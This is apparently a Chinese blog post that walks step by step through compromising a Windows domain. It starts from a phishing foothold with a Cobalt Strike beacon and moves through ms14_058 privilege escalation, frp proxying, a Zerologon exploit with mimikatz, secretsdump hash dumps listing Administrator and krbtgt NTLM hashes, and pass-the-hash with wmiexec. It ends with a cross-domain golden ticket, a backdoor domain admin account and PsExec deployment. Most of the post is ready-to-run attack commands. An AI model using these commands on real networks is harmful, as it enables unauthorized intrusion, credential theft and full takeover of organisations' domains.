结合实战内网渗透思路总结 结合实战内网渗透思路总结

结合实战内网渗透思路总结

内容:
信息收集,提权,代理搭建,域横向移动,哈希传递,票据制作,跨域攻击,上线方式

渗透过程加思路:
以钓鱼形式拿下第一台外网服务器,记得设置beacon响应为实时


首先打开一个记事本准备复制粘贴要用到的数据

可以看到我们不是最高权限,第一步肯定是要进行权限提升的,先进行主机信息的收集,查看主机的系统版本,修复的补丁

本电脑为win7 可以看到收集的信息为三级域名,三个补丁

指令:

shell systeminfo


其他的先不多想,进行提权,根据版本信息和补丁,ms14_058可以提权

提权成功

拿下最高权限可以做后门权限维持,计划任务等等,这里就不多说了

最高权限也就代表这台主机是我们的了,那我们刚才看到了主机信息有三级域名,可以猜测有内网环境,我们进行网卡信息查看

指令:

shell ipconfig /all



可以看到有域环境,双网卡,DNS首选为10.10.3.6,这时候进行内网主机存活扫描,并获得上级域的计算机名和真实ip

这里用了nbtscan工具辅助扫描
查看扫描结果,主要看dc,为域控标志,这里要把计算机名字记录好,票据会用到

既然要做域横向移动那必须上传mimikatz

利用mimikatz扫一下有没有cve2020-1472漏洞

指令:

lsadump::zerologon  /target:域控IP  /account:域控主机名$


这里是存在的,因为内网和我们渗透机ip不在一个网段,是不能互通的,所以这里做下代理
我们把这两个文件上传

渗透机开启端口映射准备接收

利用cs将上传的响应启动,我们渗透机则显示连接成功

指令:

shell frpc.exe -c frp.ini


将kali的代理设置好,我们用7000端口接收碰撞,也就是在目标机上利用另一个端口连接流量


准备就绪开始利用cve进行置空域用户

指令:

shell mimikatz "lsadump::zerologon  /target:域控ip  /account:域控主机名$  /exploit" "exit"


成功后我们在kali利用secretsdump进行无密码提出散列值,将管理员和krbtgt的哈希记录

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c696e9337845d8ada46612d047e40209

指令:

proxychains impacket-secretsdump -no-pass -just-dc 域名.com/域控主机名\$@域控ip


现在可以利用wmiexec进行哈希传递登录了

指令:

proxychains python3 wmiexec.py -hashes 获得的hash ./用户名@域控ip


现在将三个文件拉出来保存在我们的本地

分别是sam,system,security


我们先利用secretsdump将文件中的散列值提出,主要为了原本的机器码

指令:

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL


利用reinstall_original_pw进行还原

指令:

proxychains python3 reinstall_original_pw.py 域控主机名 域控ip 机器码hash


显示成功,我们可以直接来到虚拟机这里实验,直接登陆上来了
回到主轨,这时候我们先上线cs,直接用wmiexec哈希传递登录上传cs执行就可以了,但是要在cs这里做中转,相当于利用了外网的服务器做跳板,所以这里监听也写外网的内网网卡ip

将新生成的cs马启动

来到cs看到已经上线了

已经是最高权限了,这时候就是新的信息收集,这一部分忽略 我们知道还有父域的10.10.3.5所以我们要开始制作黄金票据了,首先上传mimikatz获取父子域的sid(就像实名制会员卡一人一张,计算机也一样)

指令:

shell mimikatz "privilege::debug" "lsadump::lsa /patch /user:administrator$" "lsadump::trust /patch" "exit"


黄金票据的几个要点我用txt列出来了

指令:

shell "kerberos::golden /user:administrator /domain:现在所在域控名.com /sid:子域控sid /sids:父域sid-519 /krbtgt:c696e9337845d8ada46612d047e40209  /ptt" "exit"


进行票据攻击,显示成功

但是响应却失败

换一种思路,将3389打开并创建新的域控用户进行远程实现黄金票据

指令:

shell net user test QWEasd123 /add /domain//创建域用户
shell net group "Domain Admin" test /add /domain//添加到域管理员组


开启3389端口远程服务

进行远程登录

登录之后进行黄金票据攻击

看到可以交互

上传cs的exe并利用PsExec.exe进行上线

运行exe文件查看cs是否上线,可以看到父域上线并且是最高权限

完成本次内网渗透

评论 0

挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
sitemap